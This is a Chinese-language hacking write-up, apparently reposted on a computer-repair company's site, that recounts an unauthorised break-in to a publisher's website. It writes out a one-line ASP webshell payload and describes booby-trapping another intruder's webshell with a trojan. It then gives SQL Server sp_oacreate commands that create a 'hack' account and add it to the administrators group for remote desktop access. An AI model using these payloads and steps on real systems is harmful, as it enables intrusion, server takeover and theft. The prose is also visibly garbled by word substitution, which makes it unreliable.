设为主页 | 加入收藏 | 繁體中文

入侵国内某知名出版社网站全记录


  如许便是没有做防下载处置惩罚,然后顿时在留言板中留言在“主页”另有其他中央都输出了“ <%eval request("#")%> ”提交乐成,用海洋c端连接发明照旧不乐成(大概是被过滤掉了吧!)!怎么办呢?忧郁...于是用迅雷下载了这个ASP数据库更名为MDB后打开,找出办理员账号密码,图13
  登陆留言板,经过测试发明在办理员页面的公告中可以插入木马,图14
  这回乐成拿到webshell了(图15 )
  对了遗忘报告大家刚刚跟guestbook.asp同一目录下的谁人a.asp便是别人留的海洋2006的asp木马!
  小插曲
  拜访谁人a.asp将html代码保存上去,这里的代码便是海洋2006的登陆界面,然后用我的木马编辑谁人a.asp将内里的代码全部清空掉,粘贴上刚刚复制的登陆页面的html代码,再在最上面挂上我的网页木马!哈哈!如许只需那家伙拜访自己的webshell虽然看到登陆界面了但是怎么也登陆不进去,而且还中了我们的木马!一个字爽!
  三.拿下目标
  我用的也是海洋2006不外是加密免杀的,现在便是提权了,用海洋的“服务器相干数据”看了看开的服务,发明并没有安装serv-U,很多菜鸟看到这里大概就会放弃了!其实没有serv-u也没关系,毕竟条条大陆通罗马么!还记得刚刚注入时是SA的权限么?这就说明数据库连接用的是SA,到网站主页下任意打开一个ASP文件看看,图16
  “common/inc_const.asp”这个便是ASP被打开后先挪用的数据库连接文件了,我们顿时到该目录下的common找到inc_const.asp对它编辑,图17
  怎么样?是不是有大发明了,其实提权便是这么简单!SA密码袒露无疑啊!
  现在该怎么办呢?拿出SQL连接器输出密码连接上去,哈哈乐成了,选择“使用目录”==》“实行DOS命令”加个用户尝尝,图18
  --------------------------------------------------------------------------------
  晕,xplog70.dll被删了,可爱,既然开了3389只需加个用户就可以了,加用户也不一定要用XP_cmdshell,可以尝尝另外转储过程,打开"SQL盘问阐发器分离版本"输出IP和密码点连接,图19
  OK,我们在“盘问”中输出:
  ------------------------------------------------
  declare @cmd INT
  exec sp_oacreate 'wscript.shell',@cmd output
  exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'
  -----------------------------------------------
  declare @cmd INT
  exec sp_oacreate 'wscript.shell',@cmd output
  exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'
  --------------------------------------------------
  这个便是增长一个hack的用户密码也是hack,再提升为办理员权限,图20
  怎么样?是不是条条大路通罗马?
  用增长的用户登陆3389看看(图21)
  哈哈,乐成!使命完成!^_^
  四.小结
  由于篇幅题目另有很多入侵的过程没有写出来,这里写的是重要的入侵过程了,文章读起来很简单(我在现实中但是遇到很多题目),但要是你现实操作起来大概就会遇到很多题目了,想报告广大菜鸟朋友:真正的技术是实践出来的不是看出来的。这里不但给大家展示的是一次入侵过程更想把入侵中阐发题目的思想转达给各位菜鸟朋友们,由于我水平无限大概文章有很多不足之处,所以还请各位见笑了!
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: